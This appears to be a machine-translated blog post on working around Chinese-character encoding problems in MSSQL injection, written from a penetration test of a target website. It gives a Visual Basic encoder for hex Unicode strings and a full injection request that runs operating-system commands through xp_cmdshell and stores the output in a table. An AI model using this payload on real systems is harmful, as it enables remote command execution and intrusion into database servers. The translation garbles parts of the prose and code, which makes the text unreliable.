How to handle Chinese Characters in MSSQL Injection

Lab @ evan brings you hands-on penetration testing experience!
During a penetration test, it was found that the root directory of the website of the other party uses Chinese characters. During the Pangolin test, it was found that the cmd command like "dir c: \ Chinese path" always encountered an error, later, we used BurpSuite to analyze the sent data packets and found that Pangolin uses a URL-like encoding method to encode Chinese characters.

For example, the "Chinese path" is encoded:

Xd600d000ce00c400c200b700be00b600

Obviously, each Chinese character is split into two dual-byte and ends with 00, which does not conform to the Unicode rules. If it is Unicode encoding, each Chinese character should occupy two bytes, it should not appear at 00.

Www.2cto.com seems that Pangolin has a problem with the processing of Chinese characters, but I can't modify its binary code. I can only make an encoding program myself, and then cooperate with BurpSuite to execute the penetration test. The following is the core code in a small program that processes encoding. It is compiled in Visual Basic 2010 Express Edition.

Private Sub button#click (ByVal sender As System. Object, ByVal e As System. EventArgs) Handles Button1.Click
Dim strOut As String = ""
For I = 1 To Len (TextBox1.Text) 'traverse the incoming characters one by one
Dim strChar As String = ""
StrChar = Hex (AscW (Mid (TextBox1.Text, I, 1) 'converts the current character into a hexadecimal Unicode code
If Len (strChar) = 2 then' If it is an ASCII character, add 00 to it
StrChar = strChar + "00"
Else
StrChar = Mid (strChar, 3, 2) + Mid (strChar, 1, 2) 'swaps the high and low bits of this encoding (otherwise MSSQL Parsing is incorrect)
End If
StrOut = strOut + strChar
Next
TextBox2.Text = "0x" + strOut. ToLower
End Sub

After using this program to encode the Chinese character "Chinese path", the result is as follows:

0x2d4e8765ef8d845f

Set the BurpSuite proxy in Pangolin and use the BurpSuite to send @ z = ?? You can get the desired result by replacing the question mark with the calculated character encoding.

<GET/news_detail.aspx? Newsid = 3941% 20; declare % 20 @ z % 20 nvarchar (4000) % 20 set % 20 @ z = ?? % 20 insert % 20 into % 20 [pangolin_test_table] (resulttxt) % 20 exec % 20master. dbo. xp_cmdshell % 20 @ z; alter % 20 table % 20 [pangolin_test_table] % 20add % 20id % 20int % 20not % 20 null % 20 identity % 20 (1.1) -- HTTP/>
Posted